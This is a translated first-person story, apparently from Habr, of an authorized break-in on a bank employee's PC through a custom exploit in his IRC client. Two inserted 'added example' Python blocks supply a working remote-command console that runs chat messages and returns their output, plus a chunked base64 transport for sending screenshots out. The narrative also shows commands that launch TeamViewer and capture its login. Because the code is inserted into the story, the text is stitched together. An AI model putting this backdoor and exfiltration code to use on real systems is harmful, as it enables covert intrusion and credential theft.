Two out of five for you, or an audit with a break-in

As always: no names or titles, and since I am additionally bound by a signed NDA, with a slightly altered story (and omitting some details I did not get permission to publish).
What follows is a true story of breaking into an employee's computer at ... well, let's say a certain private bank. The events your humble servant describes took place in a certain European country not so long ago, before the DSGVO (GDPR, RGPD) but while it was already on the doorstep, so to speak.


It all started with a security audit: ..., interviews, looking at everything and everyone under a magnifying glass, finding and working through potential loopholes and bottlenecks for getting in (and getting out), ..., and the actual debriefing. At which the customer finally received a conclusion disappointing for him: "a three out of five, and that with a stretch".


Let us leave out the words that had to be heard from the IT security people, who were blushing before our eyes, but the general lyrical message was this: I am rushing into unfounded accusations, they have everything locked down, and the CSO keeps the key in his pocket, next to his heart.


Attempts to explain that a security system built around firewall + proxy + a WebWasher-like content filter and antivirus, without at least a somewhat developed hybrid IDS (HIDS + APIDS), honeypots, etc. etc., is, firstly, by definition not secure, and that, secondly, I had already shown several places where it is, to put it mildly, not comme il faut, and attempts to return to a constructive dialogue (actually, back to the analysis) broke against a three-storey wall of offence built by the whole department.


Having closed the meeting and dismissed the employees, the CSO, together with two important bosses, honestly tried to find out from me where the dog was buried and how to live on, that is, what actually and specifically, in my humble opinion, needs to be done.


Since no glimmer of understanding appeared afterwards either, I enthusiastically accepted the offer to show it in practice. After explaining what does not work well right now, and settling the formalities (signing a few more papers, etc.), I got the go-ahead for the "hack".


My remark that I do not much like working "blind" (dreary, long and expensive, and pentesting then becomes a matter of luck) and my request for some additional information (for example, some personal data of individual employees, such as developers and security staff) did not meet with understanding either.


Are you a hacker or not?! (Actually, no: I am a developer, and this is more of a hobby.)


I will not dwell on the further discussion for long: as always, the money and time factor (that is, the same money) did the convincing.


So as a result we have some knowledge of the company's security structure (obtained during the preliminary audit), as well as the full names and brief biographies of 4 administrators and 3 developers.


Why admins and developers, actually? After all, one could have asked for the "girls from accounting" instead, sent them some "kitten" with a much less harmless animal attached (or pulled off something similar from the social-engineering field). But...
Many companies, as a rule, very much dislike being told about this at the PoC presentation, i.e. a "system hack" built on social-engineering intrigues is at least not welcome, however ingenious it may be.


Returning to the techies: firstly, they are no less "social" (which does not mean at all that they will launch some "kitten", but the fact itself matters), and secondly, they usually have a computer that is more "developed" in functional terms (you will find anything on it). And, more interestingly, they often have "privileges", unlike the same girl from accounting, i.e. they are either less restricted in terms of security and system constraints (policies and co; you should, for example, somehow be able to run a freshly compiled exe) and/or they can themselves climb through the "wall" the security people built (for example, by forwarding a tunnel through the proxy), etc. etc.


And again, getting through the protection via a programmer's or admin's computer sounds quite different from, say, "forcing" an accountant to run a Trojan.


So, the inputs are received, the tasks are stated; let's go...


The first step is gathering information about the "customers": who, what, where, when.


I won't digress here, the article isn't really about that, so I'll just say that I settled on a rather social guy, with Facebook and the like, including his own YouTube channel (YouTube, Vasya!), several open-source projects (both in a group and his own) and simply gigantic contribution activity (one wonders whether he works at his main job at all).


Finding out who is who today is generally not a problem at all (somewhere the real name is used alongside the nickname, somewhere it's the IP address of the company's proxy, and the picture comes together), but nobody really hides anyway.


What made me slow down on him, apart from my natural flair, was the fact that in one community our hero did more or less active support in the chat, using an IRC client that, in addition to the IP (where his legs grow from), also gave away its own name and version in the user-info; a client with well-known bugs/holes that, for good reason, is wrapped in plug-ins by default.


Well, as usual: one evening, the family asleep, some drivel on the box, ours losing again :) I found the familiar nickname in that chat as an active user with a connection longer than 12 hours (judging by the log, with intermediate disconnects/reconnects, because a corporate proxy is such a thing, but more than half a day since the first connection), from the IP address I needed, i.e. with a "login" of the form max.mustermann@proxyext.our-company.example.com .


That is, either our client has a 24-hour working day, or, more likely (since 2 hours had passed since his last message), he simply did not turn off the work computer and left the IRC client running.


Or maybe he put the computer to sleep, but (here again the fault of security guides or administrators) it happens that the latter wakes up by itself, for example to install Windows updates (and, after a 4-hour pause, to reboot), or simply on a wake-on-LAN signal...


Anyway, I had a certain amount of time to poke at the computer, or rather at the IRC client of our "victim".


Not finding a single known hole in this particular (by the way, current at the time) version of the IRC client, I armed myself with IDA, OllyDbg, etc., looked at the sources (quiet horror, Vasya!) and began to look for some vulnerability that would at least give the ability to execute something there, with an eye to controlling the IRC client remotely (and we remember the plugins).


And one was found, relatively quickly at that!


What allowed seizing control was an unsafe sprintf call into a stack buffer with a %s inside, fed from poorly filtered foreign input (together with an encoding injection), which allowed writing an exploit-code loader onto the stack (thanks to the client's developers, to Microsoft for the low-lying stack, and to a lucky coincidence).


Although I still had to suffer: because of DEP you cannot execute directly from the stack, so you need to write a copy of the "program code" for execution, find a memcpy call with a ret at the end to copy it to the right place (overwriting a little-used class), redirect the output of several procedures to the right place, and overwrite several VTABLE entries so that the next virtual method call generates an event that triggers some Python code as a plug-in (and replace that Python code with your own, a loader that assembles a ready exploit toolkit from fragmented messages).


Oh yes, I also needed to build a plugin (again, thanks to the client's developers for such generous functionality) as a proxy that changes messages on the fly (adding a wrapper to initiate the injection, breaking its encoding, inserting incomplete surrogates in the right places, etc.), encode the initial injection-message loader, and so on.
In addition, I had to write a small Python script in the form of a new client plug-in for the target system, acting as a console emulator (accepting my messages as its stdin and sending stdout + stderr back to my nickname as private messages).
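The console-emulator plug-in described above, as an added example (not the author's plug-in and not any real IRC client's API): one private message is one REPL statement, everything it prints on stdout or stderr goes back to the operator's nick, and the ">>> " prompt closes each reply. The IRC client itself is assumed away as a send(nick, text) callback, the nick filter and the per-message payload budget are assumptions, and the loop at the bottom drives it with constructed messages so it runs offline.

```python
import contextlib
import io
import traceback

# Assumed per-message payload budget; real IRC lines are capped at 512 bytes including framing.
IRC_LINE_LIMIT = 400


class RemoteConsole:
    """Console emulator: execute Python received as private messages, return what it printed.

    The operator's messages are the stdin of a REPL; stdout + stderr are sent back as
    private messages.  The client is abstracted as a send(nick, text) callback because
    the real plugin API is not on the page (assumption).
    """

    PROMPT = ">>> "

    def __init__(self, send, operator_nick):
        self.send = send                    # callable(nick, text): delivers one private message
        self.operator = operator_nick       # only this nick may issue commands
        self.ns = {"__name__": "__irc__"}   # persistent namespace, so variables survive between messages

    def run(self, src):
        """Execute one message as a single REPL statement and return everything it printed."""
        buf = io.StringIO()
        with contextlib.redirect_stdout(buf), contextlib.redirect_stderr(buf):
            try:
                # "single" mode echoes expression values via sys.displayhook, exactly like the REPL,
                # so 'from glob import glob as ls; ls("*")' prints the list without an explicit print().
                exec(compile(src, "<irc>", "single"), self.ns)
            except BaseException:           # SystemExit included: the client must stay alive
                traceback.print_exc()       # goes to the redirected stderr, i.e. back to the operator
        return buf.getvalue()

    def handle_privmsg(self, nick, text):
        """Entry point the client would call per incoming private message; returns messages sent."""
        if nick != self.operator:
            return 0                        # everybody else's messages are left untouched
        sent = 0
        for line in self.run(text).splitlines():
            for i in range(0, len(line) or 1, IRC_LINE_LIMIT):   # long lines are split to fit
                self.send(self.operator, line[i:i + IRC_LINE_LIMIT])
                sent += 1
        self.send(self.operator, self.PROMPT)   # the prompt the operator waits for
        return sent + 1


if __name__ == "__main__":
    # Constructed session: the "client" just collects outgoing PRIVMSGs in a list.
    outbox = []
    console = RemoteConsole(lambda nick, msg: outbox.append((nick, msg)), "operator")
    for cmd in ("import os; os.name", "x = 6 * 7", "x", "1 / 0"):
        console.handle_privmsg("operator", cmd)
    for nick, msg in outbox:
        print(f"PRIVMSG {nick} :{msg}")
```

Note what this buys an attacker and what it costs: nothing is written to disk, no new binary has to pass policy, and the only network traffic is the chat session the client already had open through the proxy. The nick check is the whole "authentication", which is why the author's next worry was about the messages being visible in the victim's window rather than about anyone else taking over the console.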


Having cobbled all this together, I launched that IRC client to try myself as the victim, i.e. to see how it would work in full, finished form.


And having sent several private injection messages through my plugin from another session in a second running copy of the application, I was delighted to see the familiar Python greeting >>> (which I put into the emulator for clarity: it is the same Python).


Pleased as an elephant (noting that the attacked application had not crashed), I looked at what was going on in its message window: it was full of assorted non-ASCII characters, the most noticeable of them the one with code 90h (which is at least not comme il faut, and even gives away a hacking attempt), and I concluded that the loader had to be reworked to mask the subsequent messages (what if he is still working and notices).


I looked into the code: the output side expected a null-terminated string (NTS). I decided not to bother much and simply overwrite the first byte of the message with a zero after it had been loaded (hoping that the message is displayed on screen a little later than it is processed).


Repeating the whole process and waiting for the desired >>>, I looked again at the other window and found nothing superfluous in the chat (I'm a genius after all), so I decided to continue the test.
The message from glob import glob as ls; ls('*') went off, and I happily saw in reply the list of folders and files in the application's folder.


True, I saw the same message in the window of the attacking client, as sent to my nickname. So I also had to put a 0-byte (NTS) at the beginning of the line after it had been sent to me.


Having finished the preparatory phase and noting that our experimental subject was still in the chat (without messages, Vasya!), I had the exploit ready for our candidate.


Go...


The injection messages went off... And after a few long seconds (apparently the disk was asleep or the proxy was slow), I again saw the inviting >>> .
How I jumped around the room I will not tell here (the sight is not for the faint-hearted, because in the uncontrollable outburst of joy I banged my little toe on the leg of the chair).


Wincing from the pain and immediately thinking "what if something is clearly visible in his window, what if I messed up somewhere and the application crashes after a while", and remembering the possible forced restart after updates (if the computer had woken up for that and had already installed them), in a cold sweat (looking at the swollen little toe and calming the trembling in my hands) I hurried up.


The first step was to check, just in case, whether we were there at all:


 >>> import os; os.environ['userdomain'] 

and the answer is:


 'OUR-COMPANY' >>> 

All right, hands untied... Let's go.


Having checked with a small script that the screen was locked (LogonUI was up), and having calmed down a bit, I decided to see what was on the computer at all:


 >>> from glob import glob as ls; ls(r'C:\Program Files\*') 

and in response, not believing my luck, among many interesting things I saw the following:


 [...,'C:\\Program Files\\TeamViewer',...] >>> 

I.e. no more extra gestures needed: nothing to download, nothing to compile, and no need to look for a folder where it could all be written without violating some policy.


And off went:


 >>> import subprocess; subprocess.call([r'C:\Program Files\TeamViewer\TeamViewer.exe']) 

Well, after the answer came back:


 0 >>> 

After waiting a little for TeamViewer to get through the proxy and for the server to give it an ID (with a password), I ran a script there that looked for the TeamViewer window, took a screenshot of it and sent it back to me as a base64 line, which I decoded back into a bitmap, and was pleased to find both the ID and the password for the connection.
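The screenshot came back over the same channel as a base64 line. As an added example (not the author's script), here is what that transport looks like once it has to survive a real chat: a binary blob is base64-encoded, split into messages that fit a line budget, tagged with an index and a digest prefix, and reassembled on the other side even if lines arrive out of order, are duplicated by reconnects, or are interleaved with unrelated chat. The chunk size, the header format and the sample bytes are constructed for the example and are not from the page.

```python
import base64
import hashlib
import re

# Assumed payload budget per message; real IRC lines cap at 512 bytes including framing.
CHUNK = 300

# One message: "<tag> <i>/<n> <sha256 prefix> <base64 piece>"  (constructed header format)
_HEADER = re.compile(
    r"^(?P<tag>\w+) (?P<idx>\d+)/(?P<total>\d+) (?P<digest>[0-9a-f]{8}) (?P<data>[A-Za-z0-9+/=]*)$"
)


def pack_binary(blob, tag="shot"):
    """Split a binary blob (e.g. a screenshot) into chat-sized, self-describing messages."""
    digest = hashlib.sha256(blob).hexdigest()[:8]        # lets the receiver detect a corrupted transfer
    b64 = base64.b64encode(blob).decode("ascii")
    parts = [b64[i:i + CHUNK] for i in range(0, len(b64), CHUNK)] or [""]
    return [f"{tag} {i + 1}/{len(parts)} {digest} {p}" for i, p in enumerate(parts)]


def unpack_binary(messages, tag="shot"):
    """Reassemble one transfer from a stream of chat lines.

    Tolerates reordering, duplicates and unrelated lines; refuses mixed or incomplete
    transfers and verifies the digest before handing the bytes back.
    """
    got, total, digest = {}, None, None
    for msg in messages:
        m = _HEADER.match(msg)
        if not m or m["tag"] != tag:
            continue                                       # ordinary chat, or another transfer
        if total is None:
            total, digest = int(m["total"]), m["digest"]
        elif int(m["total"]) != total or m["digest"] != digest:
            raise ValueError("lines from two different transfers")
        got[int(m["idx"])] = m["data"]                     # duplicates simply overwrite
    if total is None or set(got) != set(range(1, total + 1)):
        raise ValueError(f"incomplete transfer: {len(got)}/{total}")
    blob = base64.b64decode("".join(got[i] for i in range(1, total + 1)))
    if hashlib.sha256(blob).hexdigest()[:8] != digest:
        raise ValueError("digest mismatch")
    return blob


if __name__ == "__main__":
    # Constructed stand-in for a screenshot: 1 KiB of bytes, not an actual image.
    screenshot = bytes(range(256)) * 4
    lines = pack_binary(screenshot)
    print(len(lines), "messages, e.g.:", lines[0][:60], "...")
    # Deliver them backwards, with a duplicate and some chat noise mixed in.
    noisy = ["<max> brb"] + lines[::-1] + [lines[2], "<ops> proxy restart in 5 min"]
    assert unpack_binary(noisy) == screenshot
    print("reassembled", len(unpack_binary(noisy)), "bytes")
```

The digest prefix and the i/n header are what make the channel usable from a defender's point of view as well: lines shaped like this in a chat log are exactly the kind of thing a content filter on the proxy could have flagged, and the story's "firewall + proxy + content filter" setup let them through unremarked.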


...


The next morning I was already getting a call from the surprised CSO, who had first received a letter from me (which, for some reason, had come from his employee's internal Exchange account), and then a frightened call from that same employee with the words "Boss, it's all gone, we've been hacked", who in the morning had found an open Word window with big text inside: "Two out of five for security. You've been hacked!", date, signature.


After that, communication with the security people was already more fruitful, without spraying saliva, tearing shirts or shouting. Taught by bitter experience (for example, as described in this article), I tried as best I could to postpone the analysis of the actual hack until later (because I first wanted to receive a purchase order for a new security concept), but after lengthy persuasion, hints at long-term cooperation, etc., as well as promises from their side "not to touch" the employee who had slipped up (a colleague, after all), I had to lay out almost all the main points.


I did then receive the fully agreed bounty for the hack (as well as the fee for the preliminary audit), but afterwards the office behaved... let's say, not exactly sportingly. To continue the show they hired a prominent, well-known auditing firm, which on principle refused to work with an external in my person.


Oh well, as they say in Germany, "Man sieht sich immer zweimal im Leben", which means "one always meets twice in life".

Source: https://habr.com/ru/post/416767/